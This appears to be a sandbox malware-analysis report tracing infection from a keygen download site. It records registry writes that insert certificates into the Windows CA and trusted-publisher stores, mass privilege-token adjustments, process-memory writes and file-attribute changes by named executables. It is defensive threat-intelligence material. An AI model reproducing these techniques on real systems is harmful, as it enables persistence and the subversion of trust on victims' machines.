5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e keygen-step-2.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B dlhyb25fezb.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B\Blob = 0300000001000000140000008d4c4a23ba9ee84ea7348fa98cc6e65fbb69de7b140000000100000014000000bbaf7e023dfaa6f13c848eadee3898ecd93232d4040000000100000010000000ab9b109ce8934f11e7cd22ed550680da0f0000000100000030000000a768343c4aeaced5c72f3571938864983a67ed49031c1da2495863caf65fe507011f7f0e70b6cb40e5631c07721be03419000000010000001000000082218ffb91733e64136be5719f57c3a15c0000000100000004000000001000001800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa24b0000000100000044000000420032004600410046003700360039003200460044003900460046004200440036003400450044004500330031003700450034003200330033003400420041005f0000002000000001000000820500003082057e30820466a003020102021067def43ef17bdae24ff5940606d2c084300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a308185310b3009060355040613024742311b30190603550408131247726561746572204d616e636865737465723110300e0603550407130753616c666f7264311a3018060355040a1311434f4d4f444f204341204c696d69746564312b302906035504031322434f4d4f444f205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010091e85492d20a56b1ac0d24ddc5cf446774992b37a37d23700071bc53dfc4fa2a128f4b7f1056bd9f7072b7617fc94b0f17a73de3b00461eeff1197c7f4863e0afa3e5cf993e6347ad9146be79cb385a0827a76af7190d7ecfd0dfa9c6cfadfb082f4147ef9bec4a62f4f7f997fb5fc674372bd0c00d689eb6b2cd3ed8f981c14ab7ee5e36efcd8a8e49224da436b62b855fdeac1bc6cb68bf30e8d9ae49b6c6999f878483045d5ade10d3c4560fc32965127bc67c3ca2eb66bea46c7c720a0b11f65de4808baa44ea9f283463784ebe8cc814843674e722a9b5cbd4c1b288a5c227bb4ab98d9eee05183c309464e6d3e99fa9517da7c3357413c8d51ed0bb65caf2c631adf57c83fbce95dc49baf4599e2a35a24b4baa9563dcf6faaff4958bef0a8fff4b8ade937fbbab8f40b3af9e843421e89d884cb13f1d9bbe18960b88c2856ac141d9c0ae771ebcf0edd3da996a148bd3cf7afb50d224cc01181ec563bf6d3a2e25bb7b204225295809369e88e4c65f191032d707402ea8b671529695202bbd7df506a5546bfa0a328617f70d0c3a2aa2c21aa47ce289c064576bf821827b4d5aeb4cb50e66bf44c867130e9a6df1686e0d8ff40ddfbd042887fa3333a2e5c1e41118163ce18716b2beca68ab7315c3a6a47e0c37959d6201aaff26a98aa72bc574ad24b9dbb10fcb04c41e5ed1d3d5e289d9cccbfb351daa747e584530203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e04160414bbaf7e023dfaa6f13c848eadee3898ecd93232d4300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c050003820101007ff25635b06d954a4e74af3ae26f018b87d33297edf840d2775311d7c7162ec69de64856be80a9f8bc78d2c86317ae8ced1631fa1f18c90ec7ee48799fc7c9b9bccc8815e36861d19f1d4b6181d7560463c2086926f0f0e52fdfc00a2ba905f4025a6a89d7b4844295e3ebf776205e35d9c0cd2508134c71388e87b0338491991e91f1ac9e3fa71d60812c364154a0e246060bac1bc799368c5ea10ba49ed9424624c5c55b81aeada0a0dc9f36b88dc21d15fa88ad8110391f44f02b9fdd10540c0734b136d114fd07023dff7255ab27d62c814171298d41f450571a7e6560afcbc5287698aeb3a853768be621526bea21d0840e494e8853da922ee71d0866d7 dlhyb25fezb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC vpn.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be vpn.tmp -
Runs ping.exe 1 TTPs 4 IoCs
Processes:
PING.EXEPING.EXEPING.EXEPING.EXEpid process 4816 PING.EXE 6372 PING.EXE 4652 PING.EXE 2308 PING.EXE -
Script User-Agent 18 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 280 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 790 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1242 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1760 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 205 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 235 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 793 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1814 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 256 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 693 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1763 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1816 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 210 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 233 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 697 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1221 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 206 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 276 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
chrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exesetups.tmpWerFault.exekey.exemultitimer.exepid process 3620 chrome.exe 3620 chrome.exe 2400 chrome.exe 2400 chrome.exe 4708 chrome.exe 4708 chrome.exe 4380 chrome.exe 4380 chrome.exe 4600 chrome.exe 4600 chrome.exe 1128 chrome.exe 1128 chrome.exe 4892 chrome.exe 4892 chrome.exe 4996 chrome.exe 4996 chrome.exe 896 setups.tmp 896 setups.tmp 5064 WerFault.exe 5064 WerFault.exe 5064 WerFault.exe 5064 WerFault.exe 5064 WerFault.exe 5064 WerFault.exe 5064 WerFault.exe 5064 WerFault.exe 5064 WerFault.exe 5064 WerFault.exe 5064 WerFault.exe 5064 WerFault.exe 5064 WerFault.exe 5064 WerFault.exe 5064 WerFault.exe 5064 WerFault.exe 5064 WerFault.exe 5064 WerFault.exe 5064 WerFault.exe 5064 WerFault.exe 4924 key.exe 4924 key.exe 4120 multitimer.exe 4120 multitimer.exe 4120 multitimer.exe 4120 multitimer.exe 4120 multitimer.exe 4120 multitimer.exe 4120 multitimer.exe 4120 multitimer.exe 4120 multitimer.exe 4120 multitimer.exe 4120 multitimer.exe 4120 multitimer.exe 4120 multitimer.exe 4120 multitimer.exe 4120 multitimer.exe 4120 multitimer.exe 4120 multitimer.exe 4120 multitimer.exe 4120 multitimer.exe 4120 multitimer.exe 4120 multitimer.exe 4120 multitimer.exe 4120 multitimer.exe 4120 multitimer.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
gaooo.exepid process 688 gaooo.exe 688 gaooo.exe -
Suspicious behavior: SetClipboardViewer 3 IoCs
Processes:
6012005.exe5580281.exe7012278.exepid process 7724 6012005.exe 8172 5580281.exe 7460 7012278.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Setup.exeaskinstall20.exeWerFault.exemultitimer.exetaskkill.exeMicrosoftEdge.exemultitimer.exekey.exedescription pid process Token: SeDebugPrivilege 4500 Setup.exe Token: SeCreateTokenPrivilege 640 askinstall20.exe Token: SeAssignPrimaryTokenPrivilege 640 askinstall20.exe Token: SeLockMemoryPrivilege 640 askinstall20.exe Token: SeIncreaseQuotaPrivilege 640 askinstall20.exe Token: SeMachineAccountPrivilege 640 askinstall20.exe Token: SeTcbPrivilege 640 askinstall20.exe Token: SeSecurityPrivilege 640 askinstall20.exe Token: SeTakeOwnershipPrivilege 640 askinstall20.exe Token: SeLoadDriverPrivilege 640 askinstall20.exe Token: SeSystemProfilePrivilege 640 askinstall20.exe Token: SeSystemtimePrivilege 640 askinstall20.exe Token: SeProfSingleProcessPrivilege 640 askinstall20.exe Token: SeIncBasePriorityPrivilege 640 askinstall20.exe Token: SeCreatePagefilePrivilege 640 askinstall20.exe Token: SeCreatePermanentPrivilege 640 askinstall20.exe Token: SeBackupPrivilege 640 askinstall20.exe Token: SeRestorePrivilege 640 askinstall20.exe Token: SeShutdownPrivilege 640 askinstall20.exe Token: SeDebugPrivilege 640 askinstall20.exe Token: SeAuditPrivilege 640 askinstall20.exe Token: SeSystemEnvironmentPrivilege 640 askinstall20.exe Token: SeChangeNotifyPrivilege 640 askinstall20.exe Token: SeRemoteShutdownPrivilege 640 askinstall20.exe Token: SeUndockPrivilege 640 askinstall20.exe Token: SeSyncAgentPrivilege 640 askinstall20.exe Token: SeEnableDelegationPrivilege 640 askinstall20.exe Token: SeManageVolumePrivilege 640 askinstall20.exe Token: SeImpersonatePrivilege 640 askinstall20.exe Token: SeCreateGlobalPrivilege 640 askinstall20.exe Token: 31 640 askinstall20.exe Token: 32 640 askinstall20.exe Token: 33 640 askinstall20.exe Token: 34 640 askinstall20.exe Token: 35 640 askinstall20.exe Token: SeRestorePrivilege 5064 WerFault.exe Token: SeBackupPrivilege 5064 WerFault.exe Token: SeDebugPrivilege 5064 WerFault.exe Token: SeDebugPrivilege 752 multitimer.exe Token: SeDebugPrivilege 500 taskkill.exe Token: SeDebugPrivilege 4712 MicrosoftEdge.exe Token: SeDebugPrivilege 4712 MicrosoftEdge.exe Token: SeDebugPrivilege 4712 MicrosoftEdge.exe Token: SeDebugPrivilege 4712 MicrosoftEdge.exe Token: SeDebugPrivilege 4120 multitimer.exe Token: SeImpersonatePrivilege 4924 key.exe Token: SeTcbPrivilege 4924 key.exe Token: SeChangeNotifyPrivilege 4924 key.exe Token: SeCreateTokenPrivilege 4924 key.exe Token: SeBackupPrivilege 4924 key.exe Token: SeRestorePrivilege 4924 key.exe Token: SeIncreaseQuotaPrivilege 4924 key.exe Token: SeAssignPrimaryTokenPrivilege 4924 key.exe Token: SeImpersonatePrivilege 4924 key.exe Token: SeTcbPrivilege 4924 key.exe Token: SeChangeNotifyPrivilege 4924 key.exe Token: SeCreateTokenPrivilege 4924 key.exe Token: SeBackupPrivilege 4924 key.exe Token: SeRestorePrivilege 4924 key.exe Token: SeIncreaseQuotaPrivilege 4924 key.exe Token: SeAssignPrimaryTokenPrivilege 4924 key.exe Token: SeImpersonatePrivilege 4924 key.exe Token: SeTcbPrivilege 4924 key.exe Token: SeChangeNotifyPrivilege 4924 key.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
chrome.exeSetup3310.tmpIBInstaller_97039.tmpvpn.tmp5snr5w1i4po.tmpdlhyb25fezb.exevict.tmpchrome.exepid process 3620 chrome.exe 3620 chrome.exe 3620 chrome.exe 3620 chrome.exe 3620 chrome.exe 3620 chrome.exe 3620 chrome.exe 3620 chrome.exe 3620 chrome.exe 3620 chrome.exe 3620 chrome.exe 3620 chrome.exe 3620 chrome.exe 3620 chrome.exe 3584 Setup3310.tmp 2984 IBInstaller_97039.tmp 3944 vpn.tmp 1580 5snr5w1i4po.tmp 5272 dlhyb25fezb.exe 3944 vpn.tmp 3944 vpn.tmp 3944 vpn.tmp 3944 vpn.tmp 3944 vpn.tmp 3944 vpn.tmp 3944 vpn.tmp 3944 vpn.tmp 3944 vpn.tmp 3944 vpn.tmp 3944 vpn.tmp 3944 vpn.tmp 3944 vpn.tmp 3944 vpn.tmp 3944 vpn.tmp 3944 vpn.tmp 3944 vpn.tmp 3944 vpn.tmp 3944 vpn.tmp 3944 vpn.tmp 3944 vpn.tmp 3944 vpn.tmp 3944 vpn.tmp 3944 vpn.tmp 3944 vpn.tmp 3944 vpn.tmp 3944 vpn.tmp 3944 vpn.tmp 3944 vpn.tmp 3944 vpn.tmp 3944 vpn.tmp 3944 vpn.tmp 3944 vpn.tmp 1312 vict.tmp 5388 chrome.exe 5388 chrome.exe 3944 vpn.tmp 3944 vpn.tmp 3944 vpn.tmp 3944 vpn.tmp 3944 vpn.tmp 3944 vpn.tmp 3944 vpn.tmp 3944 vpn.tmp 3944 vpn.tmp -
Suspicious use of SendNotifyMessage 2 IoCs
Processes:
chrome.exepid process 3620 chrome.exe 3620 chrome.exe -
Suspicious use of SetWindowsHookEx 8 IoCs
Processes:
MicrosoftEdge.exegaooo.exeMicrosoftEdge.execmd.exeapp.execmd.exeMaskVPNUpdate.exepid process 4712 MicrosoftEdge.exe 688 gaooo.exe 688 gaooo.exe 6852 MicrosoftEdge.exe 6112 cmd.exe 5568 app.exe 6348 cmd.exe 5336 MaskVPNUpdate.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
chrome.exedescription pid process target process PID 3620 wrote to memory of 3724 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 3724 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2220 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2220 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2220 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2220 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2220 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2220 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2220 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2220 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2220 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2220 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2220 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2220 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2220 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2220 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2220 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2220 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2220 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2220 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2220 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2220 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2220 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2220 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2220 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2220 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2220 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2220 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2220 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2220 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2220 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2220 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2220 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2220 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2220 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2220 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2220 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2220 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2220 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2220 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2220 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2220 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2400 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2400 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2652 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2652 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2652 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2652 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2652 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2652 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2652 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2652 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2652 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2652 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2652 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2652 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2652 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2652 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2652 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2652 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2652 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2652 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2652 3620 chrome.exe chrome.exe PID 3620 wrote to memory of 2652 3620 chrome.exe chrome.exe -
Views/modifies file attributes 1 TTPs 4 IoCs
Processes:
attrib.exeattrib.exeattrib.exeattrib.exepid process 3480 attrib.exe 5600 attrib.exe 5676 attrib.exe 7856 attrib.exe
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵PID:1864
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵PID:2212
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵PID:2496
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵PID:2444
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵PID:2432
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵PID:2160
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" https://keygenninja.com/1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3620 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ffe18cf6e00,0x7ffe18cf6e10,0x7ffe18cf6e202⤵PID:3724
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1472 /prefetch:22⤵PID:2220
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1924 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2400
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2312 /prefetch:82⤵PID:2652
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2744 /prefetch:12⤵PID:3084
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2764 /prefetch:12⤵PID:3068
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:12⤵PID:4028
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3488 /prefetch:12⤵PID:4048
-
-
